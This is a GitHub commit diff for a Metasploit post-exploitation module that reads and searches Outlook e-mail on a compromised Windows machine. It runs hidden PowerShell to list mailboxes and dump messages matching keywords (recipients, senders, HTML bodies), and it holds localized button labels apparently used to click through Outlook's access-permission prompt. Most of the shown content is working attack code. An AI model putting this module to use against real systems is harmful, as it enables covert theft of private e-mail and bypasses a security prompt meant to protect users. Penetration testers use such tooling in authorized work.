Skip to content

Commit 3cadcb9

Browse files
wez3wez3
committed
Add Windows post module for reading/searching Outlook e-mail rapid7#7 
1 parent 611e8c7 commit 3cadcb9

1 file changed

Lines changed: 16 additions & 22 deletions

File tree

modules/post/windows/gather/outlook.rb

Lines changed: 16 additions & 22 deletions
Original file line numberDiff line numberDiff line change
@@ -4,14 +4,13 @@
44
##
55

66
require 'msf/core'
7-
require 'iconv'
87

98
class Metasploit3 < Msf::Post
10-
119
include Msf::Post::Windows::Registry
10+
include Msf::Post::Windows::Powershell
1211

1312
A_HASH = { "en_US" => "Allow", "NL" => "Toestaan", "de_DE" => "Erteilen", "de_AT" => "Erteilen" }
14-
ACF_HASH = { "en_US" => "Allow access for", "NL" => "Toegang geven voor", "de_DE" => "Zugriff gewähren für", "de_AT" => "Zugriff gewähren für" }
13+
ACF_HASH = { "en_US" => "Allow access for", "NL" => "Toegang geven voor", "de_DE" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr", "de_AT" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr" }
1514

1615
def initialize(info={})
1716
super(update_info(info,
@@ -65,16 +64,14 @@ def listBoxes
6564
}
6665
}
6766
$folders \| FT FolderPath
68-
}
67+
}
6968
List-Folder
7069
|
71-
utf16conv = Iconv.conv('UTF16LE', 'ASCII', psh_script)
72-
encoded_psh = Rex::Text.encode_base64(utf16conv)
73-
listBoxes_res = session.sys.process.execute("powershell.exe -enc #{encoded_psh}", nil, {'Hidden' => true, 'Channelized' => true})
74-
sleep 3
75-
print listBoxes_res.channel.read
76-
listBoxes_res.channel.close
77-
listBoxes_res.close
70+
compressed_script = compress_script(psh_script)
71+
cmd_out, runnings_pids, open_channels = execute_script(compressed_script)
72+
while(d = cmd_out.channel.read)
73+
print ("#{d}")
74+
end
7875
currentidle = session.ui.idle_time
7976
print("\n")
8077
print_status("System has currently been idle for #{currentidle} seconds")
@@ -93,26 +90,23 @@ def readEmails(folder,keyword,searchobject,atrans,acftrans)
9390
$Namespace = $Outlook.GetNameSpace("MAPI")
9491
$account = $NameSpace.Folders
9592
$count = 0
96-
try {
9793
foreach ($acc in $account) {
9894
$count = $count+1
95+
try {
9996
$Email = $NameSpace.Folders.Item($count).Folders.Item($Folder).Items
100-
$Email \| Where-Object {$_.$searchObject -like '*' + $searchTerm + '*'} \| Format-List To, SenderEmailAddress, CreationTime, TaskSubject, HTMLBody
97+
$Email \| Where-Object {$_.$searchObject -like '*' + $searchTerm + '*'} \| Format-List To, SenderEmailAddress, CreationTime, TaskSubject, HTMLBody
98+
} catch {
99+
Write-Host "Folder not found in mailbox $count"
101100
}
102-
} catch {
103-
Write-Host "The folder does not exist in the Outlook installation. Please fill in a correct foldername."
104-
}
101+
}
105102
}
106103
Get-Emails "#{keyword}" "#{folder}" "#{searchobject}"
107104
|
108-
utf16conv = Iconv.conv('UTF16LE', 'ASCII', psh_script)
109-
encoded_psh = Rex::Text.encode_base64(utf16conv)
110-
readEmails_res = session.sys.process.execute("powershell.exe -enc #{encoded_psh}", nil, {'Hidden' => true, 'Channelized' => true})
111-
while(d = readEmails_res.channel.read)
105+
compressed_script = compress_script(psh_script)
106+
cmd_out, runnings_pids, open_channels = execute_script(compressed_script, 120)
107+
while(d = cmd_out.channel.read)
112108
print ("#{d}")
113109
end
114-
readEmails_res.channel.close
115-
readEmails_res.close
116110
end
117111

118112
def clickButton(atrans,acftrans)

0 commit comments

Comments
 (0)